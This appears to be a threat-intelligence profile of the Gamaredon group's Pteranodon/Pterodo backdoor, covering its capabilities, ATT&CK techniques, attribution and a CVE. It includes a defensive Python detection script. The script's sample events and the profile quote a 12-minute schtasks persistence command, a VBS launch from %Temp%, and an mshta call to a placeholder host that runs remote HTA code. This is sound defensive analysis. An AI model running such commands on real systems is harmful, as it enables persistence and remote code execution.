Pteranodon
Pteranodon, also tracked as Pterodo, is a custom backdoor and deployment framework used by the Russia-linked Gamaredon threat group (also known as Armageddon/UAC-0010), which Ukrainian authorities have tied to the FSB. By 2016, Gamaredon had shifted from off-the-shelf tooling such as Remote Manipulator System RAT to this custom framework, and later evolved further into a fragmented, modular malware ecosystem. Pteranodon/Pterodo has been used in campaigns targeting Ukrainian state authorities and other Ukrainian government, military, law-enforcement, national security, and critical infrastructure entities.
Documented capabilities include loading additional payloads, executing arbitrary commands, collecting system information, stealing files from local systems and USB drives, capturing screenshots at configurable intervals, and exfiltrating screenshot files and other collected data to command-and-control servers. Reported behavior includes creating subdirectories under %Temp%\reports%, storing screenshot JPEGs under C:\Users\<user>\AppData\Roaming\Microsoft\store, scheduling tasks to invoke components for persistence, using malicious VBS files for execution, and using mshta.exe to execute remotely hosted HTA files. It can delete files that interfere with execution, remove temporary files, and self-delete after the initial script runs. The malware also includes anti-detection functionality to identify sandbox environments.
CERT-UA and the Foreign Intelligence Service of Ukraine reported new Pterodo-type modifications on computers of Ukrainian state authorities, describing them as collecting system data, regularly sending it to C2 servers, and awaiting further commands, likely as preparation for cyber attacks. The malware has also been referenced in relation to CrowdStrike’s SpiceyHoney campaign attribution and in reporting on Gamaredon operations against Ukrainian victims. High-confidence indicators and artifacts mentioned in the content include the %Temp%\reports% staging path, the screenshot storage path under AppData\Roaming\Microsoft\store, use of scheduled tasks for persistence, and execution via VBS and remote HTA files through mshta.exe.
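The behaviors listed above (a scheduled task re-running a script host every few minutes, mshta.exe pulling a remote HTA, and VBS launched from a user-writable path) are all visible in process-creation telemetry. The script below is an added example, not code from Mallory or from any of the cited vendor reports: it runs three such checks over a handful of constructed process-creation events and returns the findings. The event shape, the `example.invalid` host, the file paths and the 30-minute interval threshold are all assumptions chosen for illustration.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (shape is an assumption, not a vendor schema)."""
    image: str          # full path of the started executable
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


# Constructed sample events. Two mimic the Pterodo-style behaviors from the profile,
# one is a VBS launch from %Temp%, and two are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads '
                 r'/tr "wscript.exe C:\Users\victim\AppData\Local\Temp\update.vbs"',
                 r"C:\Users\victim\AppData\Local\Temp\setup.exe"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe http://example.invalid/page.hta",   # placeholder host
                 r"C:\Windows\System32\wscript.exe"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe C:\Users\victim\AppData\Local\Temp\update.vbs",
                 r"C:\Windows\System32\svchost.exe"),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /Create /SC DAILY /ST 03:00 /tn BackupJob '
                 r'/tr "C:\Program Files\Backup\backup.exe"',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe C:\Program Files\Vendor\help.hta",
                 r"C:\Windows\explorer.exe"),
]

SCHTASKS_MINUTE = re.compile(r"/SC\s+MINUTE\s+/MO\s+(\d+)", re.I)
TASK_ACTION = re.compile(r'/tr\s+("(?P<q>[^"]*)"|(?P<u>\S+))', re.I)
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|mshta|powershell|cmd)(\.exe)?\b", re.I)
REMOTE_URL = re.compile(r"\bhttps?://\S+", re.I)
VBS_FILE = re.compile(r"\S+\.vbs\b", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\[^\\]+\\Downloads)\\", re.I)

MAX_INTERVAL_MIN = 30   # assumption: minute-granularity tasks above this are left alone


def check_scheduled_task(ev):
    """Flag schtasks /Create with a short MINUTE interval whose action is a script host."""
    if not ev.image.lower().endswith("schtasks.exe"):
        return None
    m = SCHTASKS_MINUTE.search(ev.command_line)
    if not m or int(m.group(1)) > MAX_INTERVAL_MIN:
        return None
    action = TASK_ACTION.search(ev.command_line)
    action_str = (action.group("q") or action.group("u")) if action else ""
    if not SCRIPT_HOST.search(action_str):
        return None
    return f"scheduled task every {m.group(1)} min runs a script host: {action_str}"


def check_remote_hta(ev):
    """Flag mshta.exe given an http(s) URL, i.e. executing remotely hosted HTA content."""
    if not ev.image.lower().endswith("mshta.exe"):
        return None
    m = REMOTE_URL.search(ev.command_line)
    return f"mshta.exe executing remote content: {m.group(0)}" if m else None


def check_vbs_from_user_path(ev):
    """Flag wscript/cscript running a .vbs from a user-writable location."""
    if not re.search(r"\\[wc]script\.exe$", ev.image, re.I):
        return None
    f = VBS_FILE.search(ev.command_line)
    if not f or not USER_WRITABLE.search(f.group(0)):
        return None
    return f"script host running VBS from user-writable path: {f.group(0)}"


CHECKS = (check_scheduled_task, check_remote_hta, check_vbs_from_user_path)


def triage(events):
    """Return (image, description) pairs for every event that trips a check."""
    findings = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit:
                findings.append((ev.image, hit))
    return findings


if __name__ == "__main__":
    for image, description in triage(SAMPLE_EVENTS):
        print(f"[!] {image}: {description}")
```

The daily backup task and the locally installed help file are deliberately included so the checks show their discrimination: the schtasks rule needs both a short MINUTE interval and a script-host action, and the mshta rule needs a URL rather than any HTA at all. In a real pipeline each finding would be correlated with the parent process (a task created from %Temp% by an unsigned binary is far more interesting than one created by an installer) before alerting.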
Vulnerabilities exploited
1 CVE that Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The documents ... contained malicious code exploiting the known "Microsoft Office" vulnerability CVE-2017-0199 ... which allows an attacker to execute arbitrary code on the user's device when the infected file is opened.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The group was tied to the FSB by Ukraine’s Security Service. It originally used off-the-shelf tools like Remote Manipulator System RAT, then moved to a custom framework called Pteranodon, and gradually fragmented into a constellation of standalone, modular malware families.
Indicators of Compromise (IoCs): ... Malware: Pterodo backdoor associated with UAC-0010 (Gamaredon)
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
The attackers started with spear-phishing messages using a self-extracting 7-zip file, which was downloaded via the system’s default browser.
Historically, according to the 2015 LookingGlass report Operation Armageddon: Cyber Espionage as a Strategic Component of Russian Modern Warfare, Gamaredon conducted spearphishing campaigns using stolen, highly relevant decoy documents mimicking Ukrainian institutions to target government entities.
Execution
7 techniques
The malware executable sets itself up as a scheduled task via “schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr” to run every 12 minutes.
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
Persistence
3 techniques
The malware executable sets itself up as a scheduled task via “schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr” to run every 12 minutes.
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Privilege Escalation
3 techniques
The malware executable sets itself up as a scheduled task via “schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr” to run every 12 minutes.
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Stealth
7 techniques
"...compilation of UserSupport.cs by csc.exe (the C# compiler)... into UserSupport.exe"
One of the notable features of the malware Interop component is its usage of the fake Microsoft digital certificate belonging to Microsoft Time-Stamp Service.
Many entries explicitly describe deleting artifacts 'to cover tracks,' 'evade detection,' 'remove evidence,' 'reduce their footprint,' or as part of 'post-intrusion cleanup process.' Examples include APT28 deleting files to cover tracks, FIN5 using SDelete to clean up the environment, and Dragonfly deleting operational files as part of cleanup.
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.
Multiple actors and malware families are described as using mshta/mshta.exe (including renamed mshta.exe) to execute malicious scripts/HTA/HTML/VBScript/JavaScript, download and run payloads from remote servers, and in one case help schedule tasks for persistence.
Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks. Bisonal can check to determine if the compromised system is running on VMware. Bumblebee has the ability to perform anti-virtualization checks. CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. Metamorfo has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution. RTM can detect if it is running within a sandbox or other virtualized analysis environment. Saint Bear contains several anti-analysis and anti-virtualization checks.
Discovery
3 techniques
"...provides ... information on the device name, the drive name and its serial number"
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks. Bisonal can check to determine if the compromised system is running on VMware. Bumblebee has the ability to perform anti-virtualization checks. CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. Metamorfo has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution. RTM can detect if it is running within a sandbox or other virtualized analysis environment. Saint Bear contains several anti-analysis and anti-virtualization checks.
Collection
4 techniques
This virus collects system data, regularly sends it to command-control servers and expects further commands.
The content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.
"Agent Tesla can capture screenshots of the victim’s desktop"; "AppleSeed can take screenshots on a compromised host"; "APT28 has used tools to take screenshots from victims"; "Cobalt Strike's Beacon payload is capable of capturing screenshots"; "PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals"; "Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop"
Command and Control
3 techniques
Tool: Telegram. Used as a C2 channel by UAC-0010 and others.
Tool: Telegraph. Used for IP-based C2 routing by UAC-0010.
Exfiltration
2 techniques
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
IOCs tracked for this family
6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
40 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Custom malware framework previously used by Gamaredon before its tooling evolved into more fragmented modular malware families.
A custom-built framework previously used by Gamaredon before its tooling evolved into more fragmented and modular malware variants.
A historical custom backdoor and deployment framework used by Gamaredon. It loaded additional payloads, executed arbitrary commands, captured screenshots, and stole files from local systems and USB drives for exfiltration.
Backdoor associated with UAC-0010 (Gamaredon).